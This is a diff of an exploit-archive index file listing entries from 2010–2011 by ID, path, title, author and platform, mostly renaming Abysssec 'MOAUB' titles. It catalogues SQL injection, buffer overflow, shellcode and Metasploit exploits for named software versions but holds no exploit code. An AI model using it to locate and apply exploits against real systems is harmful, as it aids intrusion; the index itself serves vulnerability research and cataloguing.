14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability",2010-09-12,"YuGj VN",php,webapps,0 14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 (forum_answer.php?que_id) SQL Injection Vulnerability",2010-09-12,Amine_92,php,webapps,0 -14980,platforms/asp/webapps/14980.txt,"MOAUB #12 - eshtery CMS SQL Injection Vulnerability",2010-09-12,Abysssec,asp,webapps,0 -14982,platforms/windows/local/14982.py,"MOAUB #12 - Adobe Acrobat and Reader ""pushstring"" Memory Corruption",2010-09-12,Abysssec,windows,local,0 +14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection Vulnerability",2010-09-12,Abysssec,asp,webapps,0 +14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - ""pushstring"" Memory Corruption",2010-09-12,Abysssec,windows,local,0 14985,platforms/php/webapps/14985.txt,"System Shop (Module aktka) SQL Injection Vulnerability",2010-09-12,secret,php,webapps,0 14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability",2010-09-12,CoBRa_21,php,webapps,0 14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection Vulnerability",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate (uploadvideos.php) Shell Upload Vulnerability",2010-09-13,Xa7m3d,php,webapps,0 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash PoC",2010-09-13,SONIC,windows,dos,0 -14991,platforms/asp/webapps/14991.txt,"MOAUB #13 - Luftguitar CMS Vulnerability: Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0 -14992,platforms/windows/dos/14992.py,"MOAUB #13 - RealPlayer FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0 +14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File Vulnerability",2010-09-13,Abysssec,asp,webapps,0 +14992,platforms/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0 14995,platforms/php/webapps/14995.txt,"Joomla Component Mosets Tree 2.1.5 Shell Upload Vulnerability",2010-09-13,jdc,php,webapps,0 14996,platforms/php/webapps/14996.txt,"Storyteller CMS (var) Local File Inclusion Vulnerability",2010-09-13,"BorN To K!LL",php,webapps,0 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection Vulnerability",2010-09-13,KnocKout,php,webapps,0 14998,platforms/php/webapps/14998.txt,"Joomla Component (com_jgen) SQL Injection Vulnerability",2010-09-14,**RoAd_KiLlEr**,php,webapps,0 -14999,platforms/asp/webapps/14999.txt,"moaub #14 - freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 -15001,platforms/windows/remote/15001.html,"MOAUB #14 - Novell iPrint Client Browser Plugin ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 +14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 +15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability",2010-09-14,"A. Plaskett",multiple,remote,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection Vulnerability",2010-09-15,vYc0d,php,webapps,0 -15008,platforms/windows/dos/15008.py,"MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 -15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 +15008,platforms/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 +15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 -15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 -15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0 +15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 +15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 -15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 -15029,platforms/php/webapps/15029.txt,"moaub #17 - phpmyfamily Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 +15027,platforms/windows/dos/15027.py,"Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 +15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service Vulnerability",2010-09-17,modpr0be,windows,dos,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint bmp crash Proof Of Concept",2010-09-18,andrew,windows,dos,0 -15035,platforms/windows/dos/15035.py,"MOAUB #18 - Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability",2010-09-18,Abysssec,windows,dos,0 -15037,platforms/php/webapps/15037.html,"MOAUB #18 - CMSimple - CSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0 +15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution Vulnerability",2010-09-18,Abysssec,windows,dos,0 +15037,platforms/php/webapps/15037.html,"CMSimple - CSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection ""reviews.php""",2010-09-18,secret,php,webapps,0 15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0 -15042,platforms/windows/remote/15042.py,"MOAUB #19 - Novell iPrint Client Browser Plugin call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 -15044,platforms/asp/webapps/15044.txt,"moaub #19 - jmd-cms Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 +15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 +15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal vulnerability",2010-09-19,sqlhacker,windows,remote,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow Proof Of Concept",2010-09-19,The_UnKn@wn,linux,dos,0 -15056,platforms/windows/remote/15056.py,"MOAUB #20 - Java CMM readMabCurveData Stack Overflow",2010-09-20,Abysssec,windows,remote,0 -15058,platforms/asp/webapps/15058.html,"MOAUB #20 - VWD-CMS CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 +15056,platforms/windows/remote/15056.py,"Java CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 +15058,platforms/asp/webapps/15058.html,"VWD-CMS - CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 15060,platforms/php/webapps/15060.txt,"LightNEasy Cms 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 15061,platforms/windows/dos/15061.txt,"microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0 15063,platforms/windows/shellcode/15063.c,"win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes",2010-09-20,ZoRLu,windows,shellcode,0 15064,platforms/php/webapps/15064.txt,"primitive cms 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 -15065,platforms/windows/dos/15065.txt,"MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 -15067,platforms/asp/webapps/15067.txt,"MOAUB #21 - Personal.Net Portal Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0 +15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 +15067,platforms/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) Heap Overflow(.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 @@ -13103,38 +13098,38 @@ id,file,description,date,author,platform,type,port 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability",2010-09-21,fuzz,linux,local,0 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass Vulnerability",2010-09-21,KnocKout,php,webapps,0 -15076,platforms/windows/dos/15076.py,"MOAUB #22 - Adobe Shockwave Director tSAC Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 -15078,platforms/asp/webapps/15078.txt,"MOAUB #22 - gausCMS Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 +15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 +15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross Site Request Forgery Vulnirability",2010-09-22,Sweet,php,webapps,0 15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH exploit (MSF)",2010-09-22,Madjix,windows,local,0 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4 & 2.0 - Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0 15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component 1.2.4 - Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0 -15086,platforms/multiple/dos/15086.py,"MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0 -15088,platforms/windows/dos/15088.txt,"MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0 +15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0 +15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection Vulnerability",2010-09-23,Gamoscu,php,webapps,0 15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 -15094,platforms/windows/local/15094.py,"MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 -15096,platforms/windows/dos/15096.py,"MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 +15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 +15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH)",2010-09-24,"James Fitts",windows,local,0 15100,platforms/win32/webapps/15100.txt,"Joomla Component (com_elite_experts) SQL Injection Vulnerability",2010-09-24,**RoAd_KiLlEr**,win32,webapps,80 15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80 15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 -15104,platforms/windows/dos/15104.py,"MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability",2010-09-25,Abysssec,windows,dos,0 -15106,platforms/asp/webapps/15106.txt,"MOAUB #25 - VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 +15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution Vulnerability",2010-09-25,Abysssec,windows,dos,0 +15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= 3.1 - (eCal module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 -15112,platforms/windows/dos/15112.py,"MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow",2010-09-26,Abysssec,windows,dos,0 -15114,platforms/php/webapps/15114.php,"MOAUB #26 - Zenphoto Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 +15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0 +15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 SQL Injection Vulnerability",2010-09-26,KnocKout,php,webapps,0 15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS Directory Traversal",2010-09-26,mr_me,cfm,webapps,0 15121,platforms/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,php,webapps,0 -15122,platforms/windows/dos/15122.html,"MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 -15124,platforms/asp/webapps/15124.txt,"MOAUB #27 - ndCMS SQL Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0 +15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 +15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0 15126,platforms/php/webapps/15126.txt,"Entrans SQL Injection Vulnerablility",2010-09-27,keracker,php,webapps,0 15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 @@ -13143,14 +13138,14 @@ id,file,description,date,author,platform,type,port 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 -15139,platforms/asp/webapps/15139.txt,"MOAUB #28 - AtomatiCMS Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0 -15141,platforms/php/webapps/15141.txt,"MOAUB #28 - JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0 +15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0 +15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQLi) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0 -15148,platforms/windows/dos/15148.txt,"MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 +15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0 @@ -13159,8 +13154,8 @@ id,file,description,date,author,platform,type,port 15155,platforms/linux/local/15155.c,"XFS Deleted Inode Local Information Disclosure Vulnerability",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 -15158,platforms/windows/dos/15158.py,"MOAUB #30 - Microsoft Unicode Scripts Processor Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 -15160,platforms/asp/webapps/15160.txt,"MOAUB #30 - ASPMass Shopping Cart Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 +15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 +15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0 @@ -13371,7 +13366,7 @@ id,file,description,date,author,platform,type,port 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 -15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - (0day) Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0 +15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal Vulnerability (0day)",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service vulnerability",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability",2010-11-05,FL0RiX,php,webapps,0 @@ -13761,7 +13756,7 @@ id,file,description,date,author,platform,type,port 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15893,platforms/php/webapps/15893.py,"amoeba cms 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0 -15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 DEP Bypass",2011-01-02,blake,windows,local,0 +15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability",2011-01-03,"non-customers crew",multiple,dos,0 @@ -13889,7 +13884,7 @@ id,file,description,date,author,platform,type,port 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks",2011-01-30,MaXe,php,webapps,0 16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0 -16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit",2011-01-30,sup3r,windows,remote,0 +16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow Exploit",2011-01-30,sup3r,windows,remote,0 16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - .replace DoS",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0 16080,platforms/php/webapps/16080.txt,"RW-Download 4.0.6 - (index.php) SQL Injection Vulnerability",2011-01-30,Dr.NeT,php,webapps,0 16083,platforms/windows/local/16083.rb,"NetZip Classic Buffer Overflow Exploit (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0 @@ -14172,7 +14167,7 @@ id,file,description,date,author,platform,type,port 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0 -16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14204,7 +14199,7 @@ id,file,description,date,author,platform,type,port 16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 Buffer Overflow",2010-07-03,metasploit,windows,remote,0 +16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,metasploit,windows,remote,0 @@ -14366,7 +14361,7 @@ id,file,description,date,author,platform,type,port 16590,platforms/windows/remote/16590.rb,"Internet Explorer DHTML Behaviors Use After 